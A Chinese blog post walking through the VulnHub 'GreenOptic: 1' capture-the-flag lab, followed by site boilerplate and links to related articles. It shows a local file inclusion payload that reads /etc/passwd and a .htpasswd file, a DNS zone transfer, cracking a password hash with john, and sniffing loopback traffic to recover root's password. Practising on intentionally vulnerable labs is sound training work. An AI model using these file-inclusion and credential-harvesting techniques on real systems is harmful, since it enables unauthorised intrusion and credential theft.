靶場練習第十九天~vulnhub靶場之GreenOptic: 1

一、準備工作

kali和靶機都選擇NAT模式(kali與靶機同網段)

1.靶場環境

下載鏈接:GreenOptic: 1 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶機的ip

掃描靶機ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

(1)掃描靶機開放的端口及其服務

nmap -A -sV 192.168.101.123

2.網站的信息收集

(1)靶機開放了80端口,先訪問靶機網站看看有什么有用的信息

貌似沒有什么信息

(2)靶機開放了10000端口,在瀏覽器中查看一下是否存在有用的信息

發現可能是dns域名解析的問題訪問不到http://192.168.101.123:1000,在/etc/hosts文件添加如下信息

192.168.101.123 websrv01.greenoptic.vm

修改完成后,點擊剛才頁面提示的那個網站

隨即進入到登錄界面

暫時不知賬號密碼,先放一放

(3)dirb掃描網站的登錄界面

dirb http://192.168.101.123

瀏覽器登錄http://192.168.101.123/account,發現了一個登錄界面

雖然沒有賬號密碼登錄,但是發現了url可能存在文件包含

http://192.168.101.123/account/index.php?include=/etc/passwd

如上圖所示,創建一個文件將這些用戶名收集起來,將篩選出來的用戶放到username里面

vim user

cat user | grep /bin/bash

vim username

dnsenum --dnsserver 192.168.101.123 --enum greenoptic.vm

(4)找到了另一個域名,設置hosts后訪問。發現需要賬號密碼

dig @192.168.101.123 greenoptic.vm axfr

在/etc/hosts 添加recoveryplan.greenoptic.vm域名

(5)發現一個加密的密碼

在view-source:http://192.168.101.123/account/index.php?include=/var/www/.htpasswd一個密碼

staff:$apr1$YQNFpPkc$rhUZOxRE55Nkl4EDn.1Po.

(6)用john進行md5解密

cp password password.dc

john --wordlist=/usr/share/wordlists/rockyou.txt password.dc

(7)成功登錄http://recoveryplan.greenoptic.vm/

用剛才獲取到用戶密碼登錄http://recoveryplan.greenoptic.vm/

進入到key information, 按照提示利用本地文件包含去讀terry-/var/mail/terry和sam-/var/mail/sam的郵件,同時下載dpi.zip。 下載好dpi.zip后解壓它

cd /下載

unzip dpi.zip

發現解壓時需要密碼,提示說以郵件形式發送

查看郵件

view-source:http://192.168.101.123/account/index.php?include=/var/mail/sam

利用HelloSunshine123密碼解壓得出dpi.pcap文件

(7)wireshark流量分析

使用wireshark對dpi.pcap文件進行流量分析

wireshark

1.選擇要分析的文件

2.分析

點擊統計里面的conversation

tcp流量是當中最多的,可能存在信息

3.找到一組賬號密碼

alex:FwejAASD1

利用剛才得到用戶密碼,ssh遠程登錄

ssh alex@192.168.101.123

3.獲取shell

三、漏洞的發現與利用

1.pspy64s監聽進程

(1)下載好pspy64s工具到/var/www/html下面

cd /var/www/html

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64s

將pspy64s工具下載到靶機上

(2)在kali開啟一個Http服務

python -m SimpleHTTPServer

(3)遠程用戶alex下載pspy64s工具

wget 192.168.101.10:8000/pspy64s

(4)提升pspy64s權限

chmod 777 pspy64s

ls -l

(5)啟動pspy64s查看進程,尋找可以利用的漏洞

./pspy64s

2.通過流量包分析

用戶alex文件夾下有一個wireshark文件夾,同時還發現alex屬于wireshark用戶組

ls -all

cat /etc/group|grep wireshark

使用dumpcap抓取本地環回地址包一段時間,下載到本地使用wireshark解析。

dumpcap -w test.pcap -i lo

一段時間后ctrl+c退出

將流量包下載到kali上

在靶機

cp test.pcap /tmp/

在kali

scp alex@192.168.101.123:/tmp/test.pcap ./

wireshark

發現有Auth包,base64解碼得到了root用戶口令ASfojoj2eozxczzmedlmedASASDKoj3o

拿下flag

cd /root

cat root.txt

本文來自互聯網用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務,不擁有所有權,不承擔相關法律責任。
如若轉載,請注明出處:http://www.pswp.cn/news/375024.shtml
繁體地址,請注明出處:http://hk.pswp.cn/news/375024.shtml
英文地址,請注明出處:http://en.pswp.cn/news/375024.shtml

如若內容造成侵權/違法違規/事實不符,請聯系多彩編程網進行投訴反饋email:809451989@qq.com,一經查實,立即刪除!

相關文章

靶場練習第二十五天~vulnhub靶場之Raven-2

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:Raven: 2 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)掃描靶機開放的…

每天一個linux命令(46):vmstat命令

vmstat是Virtual Meomory Statistics(虛擬內存統計)的縮寫,可對操作系統的虛擬內存、進程、CPU活動進行監控。他是對系統的整體情況進行統計,不足之處是無法對某個進程進行深入分析。vmstat 工具提供了一種低開銷的系統性能觀察方…

用TypeScript開發了一個網頁游戲引擎,開放源代碼

最開始學習電腦編程的原動力之一就是想自己編寫游戲,一方面很好奇這些游戲是怎么做出來的,另一方面覺得有些地方設計的不合理,希望電腦游戲既能讓人玩的有趣,又不浪費時間。 學校五年,畢業十年,學用了十多種…

靶場練習第二十一天~vulnhub靶場之Momentum-1

一、環境搭建 1.ifconfig查看kali的ip 2.創建靶機 靶機下載地址:Momentum: 1 ~ VulnHub 二、信息收集 1.nmap命令 尋找靶機ip:nmap 192.168.101.0/24 2.端口掃描 使用命令:nmap -A -T4 -p 1-65535 192.168.101.113,發現開放2…

為集合排序的三個方法

// 為集合字符串排序(cmpare:) // - null :空類型 就是字符型的0; // - [NSNull null]是對象類型,能夠存入集合的數據:為其分配了內存,但其中的值為空(不能被排序否則程序會崩潰&am…

C#ArrayList對象集合

ArrayList alist new ArrayList();//集合對像 長度可以改變,類型不限//添加單個元素可以Add()alist.Add("在在的");alist.Add(35);alist.Add(3.14);alist.Add(c);alist.Add(5000m);//如果用Add()添加數組或集合最好用 alist.AddRange()alist.AddRange(…

靶場練習第二十二天~vulnhub靶場之Momentum-2

一、準備工作 靶機下載地址:Momentum: 2 ~ VulnHub 1.查看kali的ip 使用命令ifconfig 2.使用nmap命令 nmap 192.168.101.0/24 查看開放的端口和協議:nmap -sV 192.168.101.114 二、信息收集 1.使用gobuster,尋找隱藏的網站 gobuster di…

索引深入淺出(8/10):覆蓋索引或列包含

在索引深入淺出:非聚集索引的B樹結構在聚集表里,在聚集表里,我們看到非聚集索引的葉子層只包含非聚集索引鍵和聚集索引鍵。從聚集表結構或堆表結構里拿到剩下列,SQL Server需要進行書簽/鍵查找操作。很多情況下書簽或鍵查找非常消…

靶場練習第二十三天~vulnhub靶場之GOATSELINUX: 1

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:GoatseLinux: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)掃描靶機…

Spring事務報Connection is read-only

昨天做項目時,寫了個方法,程序突然報了Connection is readonly. Queries leading to data modification are not allowed調了程序半天,最后才發現是自己在spring配置文件中增加了事務.把方法寫成了大寫開頭了,但是spring配置是以小寫開頭 代碼…

HTTP協議具體解釋

HTTP是一個屬于應用層的面向對象的協議。因為其簡捷、高速的方式。適用于分布式超媒體信息系統。它于1990年提出,經過幾年的使用與發展,得到不斷地完好和擴展。眼下在WWW中使用的是HTTP/1.0的第六版,HTTP/1.1的規范化工作正在進行之中&#x…

靶場練習第二十四天~vulnhub靶場之Raven-1

一、準備工作 kali和靶機都選擇NAT模式(kali與靶機同網段) 1.靶場環境 下載鏈接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶機的ip 掃描靶機ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 (1)掃描靶機開放的…

【知識積累】DES算法之C#加密Java解密

一、前言 在項目需要添加安全模塊,客戶端調用服務端發布的service必須要經過驗證,加密算法采用DES,客戶端采用C#進行加密,服務端使用Java進行解密。廢話不多說,直接上代碼。 二、客戶端 客戶端采用C#進行開發&#xff…

Space.js – HTML 驅動的頁面 3D 滾動效果

為了讓我們的信息能夠有效地溝通,我們需要創建用戶和我們的媒體之間的強有力的聯系。今天我們就來探討在網絡上呈現故事的新方法,并為此創造了一個開源和免費使用的 JavaScript 庫稱為 space.js。該庫是 HTML 驅動的,這意味著你不需要在網站上…

離職感言-Symbio的5年工作回顧和總結(轉載)

離職感言-Symbio的5年工作回顧和總結 (2011-06-02 21:06:30) 轉載▼2005年底,當時我在西安過的還不錯,結了婚,買了房,在公司也受老板器重,但是初為人父,孩子帶給我的那種人生緊迫感:“再不趁還…

64位CentOS6.2安裝erlang及rabbitmqServer

CentOS 6.2 64bit 安裝erlang及RabbitMQ Server 1、操作系統環境(CentOS 6.2 64bit) 1 [rootHAproxy ~]# cat /etc/issue2 3 CentOS release 6.2 (Final)4 Kernel \r on an \m5 [rootHAproxy ~]# cat /proc/cpuinfo |grep "clflush size"6 clflush size : 647 clf…

Kafka的Producer和Consumer源碼學習

先解釋下兩個概念: high watermark (HW) 它表示已經被commited的最后一個message offset(所謂commited, 應該是ISR中所有replica都已寫入),HW以下的消息都已被ISR中各個replica同步,從而保持一致。HW以上的消息可能是臟數據:部分r…

for+next()實現數組的遍歷及while list each 的使用

//要求使用for循環語句來完成該數組的遍歷//輸出每一項的鍵名和對應值&#xff1a; $a array( a > 34, 5 > 51, 13, 32, bb>15, 2 > 31 ); $len count($a); for($i0;$i<$len;$i)…

讀Pyqt4教程,帶你入門Pyqt4 _005

對話框窗體或對話框是現代GUI應用不可或缺的一部分。dialog定義為兩個或多個人之間的交談。在計算機程序中dialog是一個窗體&#xff0c;用來和程序“交談”。對話框用來輸入數據、修改數據、改變程序設置等等。對話框是用戶和計算機程序溝通的重要手段。 QColorDialog 顏色對話…

Linux內核的啟動過程分析

秦鼎濤 《Linux內核分析》MOOC課程http://mooc.study.163.com/course/USTC-1000029000  一、實驗目的及要求&#xff1a; 使用gdb跟蹤調試內核從start_kernel到init進程啟動 詳細分析從start_kernel到init進程啟動的過程并結合實驗截圖撰寫一篇署名博客&#xff0c;并在博客文…